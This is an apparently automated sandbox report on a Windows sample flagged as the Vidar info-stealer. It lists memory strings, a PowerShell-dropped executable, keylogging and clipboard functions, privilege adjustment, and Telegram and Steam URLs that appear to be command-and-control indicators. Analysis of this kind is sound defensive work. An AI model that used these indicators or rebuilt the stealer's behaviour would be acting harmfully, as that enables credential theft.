Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000015.00000003.2596195396.00000ED803028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596141624.00000ED80300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595487527.00000ED802FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: Inf.com, 00000012.00000003.2351615242.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3021593436.0000000001A33000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351564901.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351446315.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351511068.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351416495.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3019523263.0000000000391000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351644907.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
Source: Inf.com, 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
Source: Inf.com, 00000012.00000002.3025565970.0000000006F07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Inf.com, 00000012.00000002.3025565970.0000000006F07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Inf.com, 00000012.00000002.3022504782.0000000004C78000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.18.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Inf.com, 00000012.00000002.3022504782.0000000004C53000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.18.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Inf.com, 00000012.00000002.3022504782.0000000004C78000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.18.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Inf.com, 00000012.00000002.3022504782.0000000004C53000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.18.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Inf.com, 00000012.00000003.2351468070.0000000001A78000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351615242.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351564901.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351283097.0000000001A4B000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351564901.0000000001A78000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351338086.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351316659.0000000001A90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.m
Source: Inf.com, 00000012.00000002.3021428443.00000000018FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: Inf.com, 00000012.00000003.2351468070.0000000001A78000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351615242.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351564901.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351283097.0000000001A4B000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351564901.0000000001A78000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351338086.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351316659.0000000001A90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04
Source: Inf.com, 00000012.00000002.3022504782.0000000004C1C000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351615242.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3021593436.0000000001A33000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351564901.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351446315.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3019523263.00000000003DD000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351511068.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351416495.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3019523263.0000000000391000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351644907.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04ael
Source: Inf.com, 00000012.00000002.3022504782.0000000004C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04ael_
Source: Inf.com, 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
Source: Inf.com, 00000012.00000002.3022504782.0000000004C1C000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3019523263.00000000003DD000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: Inf.com, 00000012.00000002.3025048546.0000000006C2B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp, WT2NOZ.18.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Subtle.14.dr, Inf.com.7.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: chrome.exe, 00000015.00000003.2593082155.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2599700581.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000015.00000003.2593082155.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2599700581.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000015.00000003.2593082155.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2599700581.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: Inf.com, 00000012.00000002.3025048546.0000000006C2B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp, WT2NOZ.18.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Inf.com.7.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550191894.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000015.00000003.2550102367.00000ED800CCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: chrome.exe, 00000015.00000003.2596195396.00000ED803028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596141624.00000ED80300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595487527.00000ED802FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000015.00000003.2556074286.00000ED8010C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000015.00000003.2596195396.00000ED803028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596141624.00000ED80300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595800763.00000ED800F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595727393.00000ED803058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000015.00000003.2595764404.00000ED803044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595394676.00000ED8030C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595463775.00000ED8030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000015.00000003.2595764404.00000ED803044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595394676.00000ED8030C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595463775.00000ED8030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
Source: Inf.com, 00000012.00000002.3025565970.0000000006F07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Inf.com, 00000012.00000002.3025565970.0000000006F07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Inf.com, 00000012.00000002.3025565970.0000000006F07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Inf.com, 00000012.00000002.3025565970.0000000006F07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Inf.com, 00000012.00000002.3025565970.0000000006F07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.4:49760 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\putt.exe

5_2_004050F9

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_0091F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

18_2_0091F7C7

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

18_2_0091F55C

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Temp\putt.exe

5_2_004044D1

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

18_2_00939FD2

System Summary

Malicious sample detected (through community Yara rule)

Source: 18.2.Inf.com.390000.0.unpack, type: UNPACKEDPE

Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exe			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\putt.exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008BFFE0 CloseHandle,NtProtectVirtualMemory,

18_2_008BFFE0

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_00914763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

18_2_00914763

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

18_2_00901B4D

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		5_2_004038AF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0090F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		18_2_0090F20D

Creates files inside the system directory

Source: C:\Users\user\AppData\Local\Temp\putt.exe	File created: C:\Windows\NortheastPresence	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	File created: C:\Windows\FascinatingFee	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	File created: C:\Windows\FinishedMistress	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9AF9785D	0_2_00007FFD9AF9785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9AF96880	0_2_00007FFD9AF96880
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B24095D	0_2_00007FFD9B24095D
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_0040737E	5_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_00406EFE	5_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_004079A2	5_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_004049A8	5_2_004049A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C8017	18_2_008C8017
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008AE1F0	18_2_008AE1F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008BE144	18_2_008BE144
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008A22AD	18_2_008A22AD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C22A2	18_2_008C22A2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008DA26E	18_2_008DA26E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008BC624	18_2_008BC624
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0092C8A4	18_2_0092C8A4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008DE87F	18_2_008DE87F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008D6ADE	18_2_008D6ADE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00912A05	18_2_00912A05
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00908BFF	18_2_00908BFF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008BCD7A	18_2_008BCD7A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008CCE10	18_2_008CCE10
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008D7159	18_2_008D7159
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008A9240	18_2_008A9240
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00935311	18_2_00935311
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008A96E0	18_2_008A96E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C1704	18_2_008C1704
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C1A76	18_2_008C1A76
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C7B8B	18_2_008C7B8B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008A9B60	18_2_008A9B60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C7DBA	18_2_008C7DBA
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C1D20	18_2_008C1D20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C1FE7	18_2_008C1FE7

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: String function: 008C0DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: String function: 008BFD52 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: String function: 004062CF appears 58 times

Yara signature match

Source: 18.2.Inf.com.390000.0.unpack, type: UNPACKEDPE

Source: Q9R1NG.18.dr

Source: classification engine

Classification label: mal100.troj.spyw.evad.winPS1@47/55@5/7

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_009141FA GetLastError,FormatMessageW,

18_2_009141FA

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00902010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		18_2_00902010
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00901A0B AdjustTokenPrivileges,CloseHandle,		18_2_00901A0B

Source: C:\Users\user\AppData\Local\Temp\putt.exe

5_2_004044D1

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_0090DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

18_2_0090DD87

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Code function: 5_2_004024FB CoCreateInstance,

5_2_004024FB

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_00913A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

18_2_00913A0E

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cumjcpwa.1xy.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\findstr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: 2D2VASR9H.18.dr

